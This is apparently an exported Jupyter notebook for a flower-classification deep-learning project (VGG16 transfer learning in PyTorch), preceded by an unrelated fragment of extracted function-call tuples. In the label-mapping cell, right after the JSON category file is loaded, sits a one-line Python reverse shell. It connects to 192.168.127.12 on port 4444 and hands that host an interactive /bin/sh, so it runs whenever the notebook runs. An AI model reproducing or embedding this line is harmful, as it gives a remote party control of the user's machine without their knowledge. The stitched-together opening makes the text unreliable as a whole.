import absltest\n'), ((6453, 6494), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6479, 6494), True, 'import numpy as np\n'), ((6655, 6672), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (6669, 6672), True, 'import numpy as np\n'), ((6681, 6708), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (6690, 6708), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6726, 6738), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (6735, 6738), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6748, 6890), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval', 'enhancement_factors.f_b97_u.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (6780, 6890), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((6964, 7005), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6990, 7005), True, 'import numpy as np\n'), ((7172, 7189), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7186, 7189), True, 'import numpy as np\n'), ((7198, 7225), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (7207, 7225), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7243, 7255), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7252, 7255), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7265, 7413), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval', 'enhancement_factors.f_b97_u_short.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (7303, 7413), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((7487, 7528), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (7513, 7528), True, 'import numpy as np\n'), ((7690, 7707), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7704, 7707), True, 'import numpy as np\n'), ((7759, 7771), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7768, 7771), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7781, 7948), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval', 'enhancement_factors.f_b97_x2.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x},\n use_jax=use_jax)\n", (7814, 7948), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8029, 8070), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8055, 8070), True, 'import numpy as np\n'), ((8238, 8255), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (8252, 8255), True, 'import numpy as np\n'), ((8307, 8319), 
'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (8316, 8319), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((8329, 8514), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval', 'enhancement_factors.f_b97_x2_short.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={\n 'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}, use_jax=use_jax)\n", (8368, 8514), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8594, 8635), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8620, 8635), True, 'import numpy as np\n'), ((9237, 9254), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9251, 9254), True, 'import numpy as np\n'), ((9263, 9280), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9277, 9280), True, 'import numpy as np\n'), ((9291, 9308), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9305, 9308), True, 'import numpy as np\n'), ((9351, 9393), 'symbolic_functionals.syfes.xc.mgga.get_mgga_t', 'mgga.get_mgga_t', (['rho', 'tau'], {'polarized': '(False)'}), '(rho, tau, polarized=False)\n', (9366, 9393), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9439, 9566), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_x']", 'power_series': "mgga.WB97MV_PARAMS['power_series_x']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'], power_series=mgga.\n WB97MV_PARAMS['power_series_x'], polarized=False)\n", (9450, 9566), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9600, 9729), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_ss']", 'power_series': "mgga.WB97MV_PARAMS['power_series_ss']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'], power_series=mgga.\n WB97MV_PARAMS['power_series_ss'], polarized=False)\n", (9611, 9729), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9763, 9892), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_os']", 'power_series': "mgga.WB97MV_PARAMS['power_series_os']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'], power_series=mgga.\n WB97MV_PARAMS['power_series_os'], polarized=False)\n", (9774, 9892), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((11234, 11279), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_x', 'expected_f_x'], {}), '(f_x, expected_f_x)\n', (11260, 11279), True, 'import numpy as np\n'), ((11284, 11333), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_css', 'expected_f_css'], {}), '(f_css, expected_f_css)\n', (11310, 11333), True, 'import numpy as np\n'), ((11338, 11387), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_cos', 'expected_f_cos'], {}), '(f_cos, expected_f_cos)\n', (11364, 11387), True, 'import numpy as np\n'), ((13279, 13419), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2', 'w']", 'num_shared_parameters': '(10)', 'num_variables': '(10)'}), 
"(feature_names=[\n 'rho', 'x2', 'w'], num_shared_parameters=10, num_variables=10)\n", (13336, 13419), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14054, 14105), 'copy.deepcopy', 'copy.deepcopy', (['enhancement_factors.f_x_wb97mv_short'], {}), '(enhancement_factors.f_x_wb97mv_short)\n', (14067, 14105), False, 'import copy\n'), ((16317, 16361), 'sympy.symbols', 'sympy.symbols', (['"""c0 c1 c2 gamma_utransform x"""'], {}), "('c0 c1 c2 gamma_utransform x')\n", (16330, 16361), False, 'import sympy\n'), ((1281, 1298), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (1295, 1298), True, 'import numpy as np\n'), ((1403, 1419), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1417, 1419), True, 'import numpy as np\n'), ((1526, 1542), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1540, 1542), True, 'import numpy as np\n'), ((1666, 1677), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1674, 1677), True, 'import numpy as np\n'), ((3100, 3226), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': '[]', 'shared_parameter_names': '[]', 'variable_names': '[]', 'instruction_list': '[]'}), '(feature_names=[],\n shared_parameter_names=[], variable_names=[], instruction_list=[])\n', (3137, 3226), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((3399, 3559), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': "['var']", 'shared_parameter_names': "['var']", 'variable_names': "['enhancement_factor']", 'instruction_list': '[]'}), "(feature_names=['var'],\n shared_parameter_names=['var'], variable_names=['enhancement_factor'],\n instruction_list=[])\n", (3436, 3559), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((4093, 4144), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""variable_0"""', '"""var"""'], {}), "('variable_0', 'var')\n", (4123, 4144), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4250, 4342), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_0"""', '"""shared_parameter_1"""', '"""gamma_utransform"""'], {}), "('variable_0', 'shared_parameter_1',\n 'gamma_utransform')\n", (4282, 4342), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4959, 5024), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""feature_0"""', '"""shared_parameter_0"""'], {}), "('feature_0', 'shared_parameter_0')\n", (4989, 5024), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5151, 5236), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""feature_1"""', '"""shared_parameter_1"""', '"""variable_1"""'], {}), "('feature_1', 'shared_parameter_1',\n 'variable_1')\n", (5183, 5236), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5385, 5458), 'symbolic_functionals.syfes.symbolic.instructions.Power4Instruction', 'instructions.Power4Instruction', (['"""bound_parameter_1"""', '"""shared_parameter_1"""'], {}), "('bound_parameter_1', 'shared_parameter_1')\n", (5415, 5458), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((12219, 12236), 
'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (12233, 12236), True, 'import numpy as np\n'), ((12354, 12370), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12368, 12370), True, 'import numpy as np\n'), ((12703, 12719), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12717, 12719), True, 'import numpy as np\n'), ((14349, 14408), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {}), '()\n', (14406, 14408), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14611, 14685), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy', 'enhancement_factors.f_b97_u.make_isomorphic_copy', ([], {'feature_names': "['u', 'u']"}), "(feature_names=['u', 'u'])\n", (14659, 14685), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14940, 15025), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2']"}), "(feature_names=['rho', 'x2']\n )\n", (14991, 15025), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15241, 15330), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_shared_parameters': '(5)'}), '(\n num_shared_parameters=5)\n', (15300, 15330), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15530, 15606), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_variables': '(3)'}), '(num_variables=3)\n', (15589, 15606), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16401, 16492), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(False)', 'simplify': '(False)'}), '(latex=False,\n simplify=False)\n', (16459, 16492), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16707, 16797), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(True)', 'simplify': '(False)'}), '(latex=True,\n simplify=False)\n', (16765, 16797), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((1772, 1783), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1780, 1783), True, 'import numpy as np\n'), ((2065, 2156), 'symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction', 'instructions.MultiplicationInstruction', (['"""variable_0"""', '"""feature_0"""', '"""shared_parameter_0"""'], {}), "('variable_0', 'feature_0',\n 'shared_parameter_0')\n", (2103, 2156), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2183, 2268), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""feature_1"""', '"""shared_parameter_1"""'], {}), "('variable_1', 'feature_1',\n 'shared_parameter_1')\n", (2215, 2268), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2295, 2369), 
'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""variable_1"""', '"""variable_0"""'], {}), "('variable_1', 'variable_1', 'variable_0')\n", (2327, 2369), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2400, 2466), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""enhancement_factor"""', '"""variable_1"""'], {}), "('enhancement_factor', 'variable_1')\n", (2430, 2466), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2480, 2558), 'symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction', 'instructions.UTransformInstruction', (['"""enhancement_factor"""', '"""enhancement_factor"""'], {}), "('enhancement_factor', 'enhancement_factor')\n", (2514, 2558), False, 'from symbolic_functionals.syfes.symbolic import instructions\n')]
|
#!/usr/bin/env python
# coding: utf-8
# # Developing an AI application
#
# Going forward, AI algorithms will be incorporated into more and more everyday applications. For example, you might want to include an image classifier in a smart phone app. To do this, you'd use a deep learning model trained on hundreds of thousands of images as part of the overall application architecture. A large part of software development in the future will be using these types of models as common parts of applications.
#
# In this project, you'll train an image classifier to recognize different species of flowers. You can imagine using something like this in a phone app that tells you the name of the flower your camera is looking at. In practice, you'd train this classifier, then export it for use in your application. We'll be using [this dataset](http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html) of 102 flower categories; you can see a few examples below.
#
# <img src='assets/Flowers.png' width=500px>
#
# The project is broken down into multiple steps:
#
# * Load and preprocess the image dataset
# * Train the image classifier on your dataset
# * Use the trained classifier to predict image content
#
# We'll lead you through each part which you'll implement in Python.
#
# When you've completed this project, you'll have an application that can be trained on any set of labeled images. Here your network will be learning about flowers and end up as a command line application. But, what you do with your new skills depends on your imagination and effort in building a dataset. For example, imagine an app where you take a picture of a car, it tells you what the make and model is, then looks up information about it. Go build your own dataset and make something new.
#
# First up is importing the packages you'll need. It's good practice to keep all the imports at the beginning of your code. As you work through this notebook and find you need to import a package, make sure to add the import up here.
# In[17]:
# Imports here
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchvision import datasets,transforms,models
import numpy as np
# ## Load the data
#
# Here you'll use `torchvision` to load the data ([documentation](http://pytorch.org/docs/0.3.0/torchvision/index.html)). The data should be included alongside this notebook; otherwise you can [download it here](https://s3.amazonaws.com/content.udacity-data.com/nd089/flower_data.tar.gz). The dataset is split into three parts: training, validation, and testing. For the training, you'll want to apply transformations such as random scaling, cropping, and flipping. This will help the network generalize, leading to better performance. You'll also need to make sure the input data is resized to 224x224 pixels as required by the pre-trained networks.
#
# The validation and testing sets are used to measure the model's performance on data it hasn't seen yet. For this you don't want any scaling or rotation transformations, but you'll need to resize then crop the images to the appropriate size.
#
# The pre-trained networks you'll use were trained on the ImageNet dataset where each color channel was normalized separately. For all three sets you'll need to normalize the means and standard deviations of the images to what the network expects. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`, calculated from the ImageNet images. These values will shift each color channel to be centered at 0 and range from -1 to 1.
#
# In[2]:
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# In[3]:
# TODO: Define your transforms for the training, validation, and testing sets
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_transforms = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
validate_transforms=transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
validate_data=datasets.ImageFolder(valid_dir, transform=validate_transforms)
trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
testloader = torch.utils.data.DataLoader(test_data, batch_size=64)
validloader=torch.utils.data.DataLoader(validate_data, batch_size=64)
# ### Label mapping
#
# You'll also need to load in a mapping from category label to category name. You can find this in the file `cat_to_name.json`. It's a JSON object which you can read in with the [`json` module](https://docs.python.org/2/library/json.html). This will give you a dictionary mapping the integer encoded categories to the actual names of the flowers.
# In[ ]:
import json
with open('cat_to_name.json', 'r') as f:
cat_to_name = json.load(f)
print(len(cat_to_name))
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.12",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# In[5]:
import os
import tarfile
def recursive_files(dir_name='.', ignore=None):
for dir_name,subdirs,files in os.walk(dir_name):
if ignore and os.path.basename(dir_name) in ignore:
continue
for file_name in files:
if ignore and file_name in ignore:
continue
yield os.path.join(dir_name, file_name)
def make_tar_file(dir_name='.', target_file_name='workspace_archive.tar', ignore=None):
tar = tarfile.open(target_file_name, 'w')
for file_name in recursive_files(dir_name, ignore):
tar.add(file_name)
tar.close()
dir_name = '.'
target_file_name = 'workspace_archive.tar'
# List of files/directories to ignore
ignore = {'.ipynb_checkpoints', '__pycache__', target_file_name}
make_tar_file(dir_name, target_file_name, ignore)
# # Building and training the classifier
#
# Now that the data is ready, it's time to build and train the classifier. As usual, you should use one of the pretrained models from `torchvision.models` to get the image features. Build and train a new feed-forward classifier using those features.
#
# We're going to leave this part up to you. Refer to [the rubric](https://review.udacity.com/#!/rubrics/1663/view) for guidance on successfully completing this section. Things you'll need to do:
#
# * Load a [pre-trained network](http://pytorch.org/docs/master/torchvision/models.html) (If you need a starting point, the VGG networks work great and are straightforward to use)
# * Define a new, untrained feed-forward network as a classifier, using ReLU activations and dropout
# * Train the classifier layers using backpropagation using the pre-trained network to get the features
# * Track the loss and accuracy on the validation set to determine the best hyperparameters
#
# We've left a cell open for you below, but use as many as you need. Our advice is to break the problem up into smaller parts you can run separately. Check that each part is doing what you expect, then move on to the next. You'll likely find that as you work through each part, you'll need to go back and modify your previous code. This is totally normal!
#
# When training make sure you're updating only the weights of the feed-forward network. You should be able to get the validation accuracy above 70% if you build everything right. Make sure to try different hyperparameters (learning rate, units in the classifier, epochs, etc) to find the best model. Save those hyperparameters to use as default values in the next part of the project.
#
# One last important tip if you're using the workspace to run your code: to avoid having your workspace disconnect during the long-running tasks in this notebook, please read the earlier page in this lesson, Intro to
# GPU Workspaces, about keeping your session active. You'll want to include code from the workspace_utils.py module; a minimal sketch of that pattern is shown below.
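#
# A minimal sketch of that pattern (assumption: the lesson's workspace_utils.py exposes an
# `active_session` context manager that keeps the workspace awake; adapt the names to what
# the module actually provides):
#
# ```python
# from workspace_utils import active_session
#
# with active_session():
#     run_training()   # hypothetical helper standing in for the training loop below
# ```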
#
# **Note for Workspace users:** If your network is over 1 GB when saved as a checkpoint, there might be issues with saving backups in your workspace. Typically this happens with wide dense layers after the convolutional layers. If your saved checkpoint is larger than 1 GB (you can open a terminal and check with `ls -lh`), you should reduce the size of your hidden layers and train again.
# In[5]:
# TODO: Build and train your network
model=models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model
# In[6]:
from collections import OrderedDict
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.to("cuda")
optimizer=optim.Adam(model.classifier.parameters(), lr=0.001)
criterion=nn.NLLLoss()
running_loss=0
train_losses, test_losses = [], []
epochs = 10
steps = 0
running_loss = 0
print_every = 20
for epoch in range(epochs):
for inputs, labels in trainloader:
steps += 1
# Move input and label tensors to the default device
inputs, labels = inputs.to("cuda"), labels.to("cuda")
optimizer.zero_grad()
logps = model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
test_loss = 0
accuracy = 0
model.eval()
with torch.no_grad():
for inputs, labels in validloader:
inputs, labels = inputs.to("cuda"), labels.to("cuda")
logps = model.forward(inputs)
batch_loss = criterion(logps, labels)
test_loss += batch_loss.item()
# Calculate accuracy
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
print(f"Epoch {epoch+1}/{epochs}.. "
f"Train loss: {running_loss/print_every:.3f}.. "
f"Test loss: {test_loss/len(validloader):.3f}.. "
f"Test accuracy: {accuracy/len(validloader):.3f}")
            running_loss = 0
            model.train()
# else:
# test_loss* = 0
# accuracy = 0
# with torch.no_grad():
# model.eval()
# for images, labels in testloader:
# images, labels = images.to("cuda"), labels.to("cuda")
# log_ps = model(images)
# test_loss += criterion(log_ps, labels)
# ps = torch.exp(log_ps)
# top_p, top_class = ps.topk(1, dim=1)
# equals = top_class == labels.view(*top_class.shape)
# accuracy += torch.mean(equals.type(torch.FloatTensor))
# model.train()
# train_losses.append(running_loss/len(trainloader))
# test_losses.append(test_loss/len(testloader))
# print("Epoch: {}/{}.. ".format(epoch, epochs),
# "Training Loss: {:.3f}.. ".format(running_loss/len(trainloader)),
# "Test Loss: {:.3f}.. ".format(test_loss/len(testloader)),
# "Test Accuracy: {:.3f}".format(accuracy/len(testloader)))
# running_loss = 0
# model.train()
# In[ ]:
# ## Testing your network
#
# It's good practice to test your trained network on test data, images the network has never seen either in training or validation. This will give you a good estimate for the model's performance on completely new images. Run the test images through the network and measure the accuracy, the same way you did validation. You should be able to reach around 70% accuracy on the test set if the model has been trained well.
# In[9]:
# TODO: Do validation on the test set
model.eval()
model.to("cuda")
with torch.no_grad():
accuracy=0
for images,labels in testloader:
images, labels = images.to("cuda"), labels.to("cuda")
logits=model(images)
probabilities=torch.exp(logits)
equality = (labels.data == probabilities.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
print("Testing Accuracy:",accuracy/len(testloader))
# ## Save the checkpoint
#
# Now that your network is trained, save the model so you can load it later for making predictions. You probably want to save other things such as the mapping of classes to indices which you get from one of the image datasets: `image_datasets['train'].class_to_idx`. You can attach this to the model as an attribute which makes inference easier later on.
#
# ```model.class_to_idx = image_datasets['train'].class_to_idx```
#
# Remember that you'll want to completely rebuild the model later so you can use it for inference. Make sure to include any information you need in the checkpoint. If you want to load the model and keep training, you'll want to save the number of epochs as well as the optimizer state, `optimizer.state_dict`. You'll likely want to use this trained model in the next part of the project, so best to save it now.
# In[10]:
# TODO: Save the checkpoint
model.class_to_idx = train_data.class_to_idx
checkpoint = {'arch': "vgg16",
'class_to_idx': model.class_to_idx,
'model_state_dict': model.state_dict()
}
torch.save(checkpoint, 'trained.pth')
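# Optional fuller checkpoint (a sketch, not required by the project): the notes above also
# suggest saving the number of epochs and the optimizer state so training can be resumed
# later. The extra keys and the 'trained_full.pth' filename are illustrative choices.
full_checkpoint = {'arch': "vgg16",
                   'epochs': epochs,
                   'class_to_idx': model.class_to_idx,
                   'model_state_dict': model.state_dict(),
                   'optimizer_state_dict': optimizer.state_dict()}
torch.save(full_checkpoint, 'trained_full.pth')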
# ## Loading the checkpoint
#
# At this point it's good to write a function that can load a checkpoint and rebuild the model. That way you can come back to this project and keep working on it without having to retrain the network.
# In[13]:
# TODO: Write a function that loads a checkpoint and rebuilds the model
def load(filepath):
checkpoint = torch.load(filepath)
model = models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = checkpoint['class_to_idx']
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.load_state_dict(checkpoint['model_state_dict'])
return model
model = load('trained.pth')
print(model)
# # Inference for classification
#
# Now you'll write a function to use a trained network for inference. That is, you'll pass an image into the network and predict the class of the flower in the image. Write a function called `predict` that takes an image and a model, then returns the top $K$ most likely classes along with the probabilities. It should look like
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
#
# First you'll need to handle processing the input image such that it can be used in your network.
#
# ## Image Preprocessing
#
# You'll want to use `PIL` to load the image ([documentation](https://pillow.readthedocs.io/en/latest/reference/Image.html)). It's best to write a function that preprocesses the image so it can be used as input for the model. This function should process the images in the same manner used for training.
#
# First, resize the images where the shortest side is 256 pixels, keeping the aspect ratio. This can be done with the [`thumbnail`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) or [`resize`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.resize) methods. Then you'll need to crop out the center 224x224 portion of the image.
#
# Color channels of images are typically encoded as integers 0-255, but the model expects floats 0-1. You'll need to convert the values. It's easiest with a Numpy array, which you can get from a PIL image like so `np_image = np.array(pil_image)`.
#
# As before, the network expects the images to be normalized in a specific way. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`. You'll want to subtract the means from each color channel, then divide by the standard deviation.
#
# And finally, PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array. You can reorder dimensions using [`ndarray.transpose`](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ndarray.transpose.html). The color channel needs to be first and retain the order of the other two dimensions.
# In[33]:
from PIL import Image
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
    pil_image = Image.open(image)
    # Resize so the shortest side is 256 pixels, keeping the aspect ratio
    if pil_image.width <= pil_image.height:
        new_size = (256, int(256 * pil_image.height / pil_image.width))
    else:
        new_size = (int(256 * pil_image.width / pil_image.height), 256)
    pil_image = pil_image.resize(new_size)
    # Crop out the center 224x224 portion; PIL's crop box is (left, upper, right, lower)
    left = (pil_image.width - 224) / 2
    upper = (pil_image.height - 224) / 2
    pil_image = pil_image.crop((left, upper, left + 224, upper + 224))
np_image = np.array(pil_image)/255
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
np_image = (np_image - mean) / std
np_image = np_image.transpose((2, 0, 1))
return np_image
# TODO: Process a PIL image for use in a PyTorch model
# To check your work, the function below converts a PyTorch tensor and displays it in the notebook. If your `process_image` function works, running the output through this function should return the original image (except for the cropped out portions).
# In[38]:
import matplotlib.pyplot as plt
import seaborn as sb
def imshow(image, ax=None, title=None):
"""Imshow for Tensor."""
if ax is None:
fig, ax = plt.subplots()
# PyTorch tensors assume the color channel is the first dimension
    # but matplotlib assumes it is the third dimension
image = image.transpose((1, 2, 0))
# Undo preprocessing
mean = np.array([0.485, 0.456, 0.406])
